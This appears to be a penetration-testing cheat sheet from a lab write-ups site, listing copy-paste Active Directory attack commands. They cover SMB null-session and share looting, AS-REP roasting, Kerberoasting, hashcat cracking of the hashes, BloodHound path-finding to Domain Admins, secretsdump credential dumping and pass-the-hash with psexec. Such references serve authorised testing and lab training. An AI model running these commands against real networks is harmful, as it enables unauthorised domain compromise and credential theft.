su7t3 // Security Writeups - su7t3 // Security Writeups: https://hacksmarter-writeups.pages.dev/ - Writeups: https://hacksmarter-writeups.pages.dev/writeups/ - HackSmarter Labs: https://hacksmarter-writeups.pages.dev/writeups/hack-smarter/ - HackSmarter: Welcome — Walkthrough: https://hacksmarter-writeups.pages.dev/writeups/hack-smarter/welcome/ - Docs / Notes: https://hacksmarter-writeups.pages.dev/docs/ - Active Directory Enumeration Cheat-Sheet: https://hacksmarter-writeups.pages.dev/docs/ad-enumeration-cheatsheet/ A living reference for the AD enumeration loop. Copy-paste ready; swap ``, ``, and creds. ## Host discovery & fingerprint ```bash nmap -p- --min-rate 2000 -oA nmap/all nmap -p 53,88,135,139,389,445,464,636,3268 -sCV -oA nmap/svc nxc smb # hostname + domain + OS ``` ## SMB ```bash nxc smb -u '' -p '' --shares # null session nxc smb -u USER -p PASS --shares nxc smb -u USER -p PASS --users nxc smb -u USER -p PASS -M spider_plus # loot readable shares ``` ## LDAP ```bash ldapsearch -x -H ldap:// -b "DC=domain,DC=local" -s base nxc ldap -u USER -p PASS --asreproast asrep.hash nxc ldap -u USER -p PASS --kerberoasting kerb.hash ``` ## Kerberos ```bash # AS-REP roast (no creds needed if you have a userlist) impacket-GetNPUsers / -dc-ip -usersfile users.txt -no-pass # Kerberoast (creds needed) impacket-GetUserSPNs /USER:PASS -dc-ip -request # Crack hashcat -m 18200 asrep.hash rockyou.txt # AS-REP hashcat -m 13100 kerb.hash rockyou.txt # TGS / Kerberoast ``` ## BloodHound ```bash bloodhound-python -u USER -p PASS -d -ns -c All --zip ``` Then in the UI: mark owned → *Shortest Path to Domain Admins* → *DCSync Rights*. ## Post-compromise ```bash impacket-secretsdump /USER:PASS@ # creds/PtH impacket-psexec -hashes :NTLM /administrator@ ``` > [!WARNING] > Sync your clock before any Kerberos op: `sudo ntpdate `. Skew > 5 min = `KRB_AP_ERR_SKEW`.